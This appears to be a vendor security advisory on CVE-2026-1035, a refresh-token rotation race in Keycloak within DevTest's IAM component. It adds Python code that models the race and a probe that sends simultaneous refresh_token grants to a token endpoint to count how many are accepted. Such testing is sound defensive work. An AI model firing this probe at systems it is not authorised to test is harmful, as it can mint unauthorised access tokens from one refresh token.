A security vulnerability (CVE-2026-1035) has been identified in the Keycloak server used by the IAM component of Service Virtualization (DevTest). The vulnerability involves the `TokenManager` class failing to perform atomic validation and updates when strict refresh token rotation is enabled. This allows concurrent refresh requests to bypass single-use enforcement, potentially undermining refresh token rotation hardening.
Product: Service Virtualization (DevTest)
Component: Identity and Access Management (IAM) / Keycloak
Versions: 10.8.4 and earlier supported releases
The issue is a race condition in the Keycloak `TokenManager` where usage updates for refresh tokens are not performed atomically, allowing multiple access tokens to be issued from the same refresh token during concurrent requests.
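The following is an added example, not code from this advisory, from Keycloak or from DevTest. It models the failure mode described above in-process (a refresh-token store whose "is this token already used?" check and "mark it used" update are either separate steps or one locked step) so the effect of the race can be reproduced offline, and it includes a probe that fires N simultaneous `refresh_token` grants at a real OIDC token endpoint and counts how many are accepted. The endpoint URL, realm, client ID and refresh token in the usage section are placeholders; the in-process store is a simplified illustration and is not a reconstruction of Keycloak's `TokenManager`.

```python
"""Concurrent-refresh check for single-use (rotated) refresh tokens.

Added example for the advisory above; not Keycloak or DevTest code.
Part 1 is an in-process model of a refresh-token store with a non-atomic
(check, then update) path and a locked (atomic) path. Part 2 is a probe
that sends N concurrent refresh_token grants to a token endpoint you own
and reports how many access tokens were issued from one refresh token.
"""
import threading
import urllib.error
import urllib.parse
import urllib.request
from concurrent.futures import ThreadPoolExecutor
from typing import Optional


class RefreshTokenStore:
    """Simplified model of single-use refresh-token tracking (assumption:
    a set of consumed token IDs is the only state that matters here)."""

    def __init__(self, atomic: bool, contenders: int):
        self.atomic = atomic
        self.used = set()
        self.lock = threading.Lock()
        # Used only on the non-atomic path: it holds every contender past
        # the validity check until all have passed it, so the race is
        # reproducible rather than timing-dependent.
        self.barrier = threading.Barrier(contenders)

    def refresh(self, token: str) -> bool:
        """Return True if a new access token would be issued for `token`."""
        if self.atomic:
            # Check and update under one lock: exactly one caller wins.
            with self.lock:
                if token in self.used:
                    return False
                self.used.add(token)
                return True
        # Non-atomic: every concurrent caller can pass the check before
        # any of them records the use, so every one of them gets a token.
        if token in self.used:
            return False
        self.barrier.wait()
        self.used.add(token)
        return True


def concurrent_refreshes(store: RefreshTokenStore, token: str, n: int) -> int:
    """Refresh the same token n times in parallel; return how many succeed."""
    with ThreadPoolExecutor(max_workers=n) as pool:
        return sum(pool.map(lambda _: store.refresh(token), range(n)))


def probe_token_endpoint(token_url: str, client_id: str, refresh_token: str,
                         n: int = 10, client_secret: Optional[str] = None,
                         timeout: float = 10.0) -> int:
    """Send n simultaneous refresh_token grants; return the count of HTTP 200s.

    With single-use rotation enforced atomically this should be 1 (0 if the
    token was already consumed). A value above 1 means several access tokens
    were minted from a single refresh token. Only run this against a
    deployment you are authorised to test, with a freshly issued token.
    """
    form = {"grant_type": "refresh_token", "client_id": client_id,
            "refresh_token": refresh_token}
    if client_secret:
        form["client_secret"] = client_secret
    body = urllib.parse.urlencode(form).encode()
    release = threading.Barrier(n)  # all requests leave at the same instant

    def one_request(_):
        release.wait()
        req = urllib.request.Request(
            token_url, data=body, method="POST",
            headers={"Content-Type": "application/x-www-form-urlencoded"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status == 200
        except urllib.error.HTTPError:
            return False  # 400 invalid_grant is the expected rejection

    with ThreadPoolExecutor(max_workers=n) as pool:
        return sum(pool.map(one_request, range(n)))


if __name__ == "__main__":
    n = 8
    racy = concurrent_refreshes(RefreshTokenStore(False, n), "rt-1", n)
    safe = concurrent_refreshes(RefreshTokenStore(True, n), "rt-1", n)
    print(f"non-atomic store issued {racy} tokens from one refresh token")
    print(f"atomic store issued {safe} token from one refresh token")
    # Against a real server (placeholders; Keycloak's standard token path):
    # probe_token_endpoint(
    #     "https://sso.example.test/realms/devtest/protocol/openid-connect/token",
    #     client_id="devtest-client", refresh_token="<freshly issued token>",
    #     n=10, client_secret="<secret if confidential client>")
```

The probe reports only how many grants were accepted; it does not tell you whether the server issued distinct sessions or merely tolerated a replay window, so read its result alongside the server's refresh-token rotation settings and log entries for the test client rather than as a standalone verdict.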
This third-party vulnerability is addressed by Keycloak and the fix is scheduled to be included in the **DevTest 10.9.1** release.
To remediate this issue, upgrade to DevTest 10.9.1 when it becomes generally available. This release is currently scheduled for the end of April 2026.
Note: If an immediate remediation is required before the release, please contact Broadcom Support to discuss potential security exceptions or interim workarounds based on your specific deployment configuration.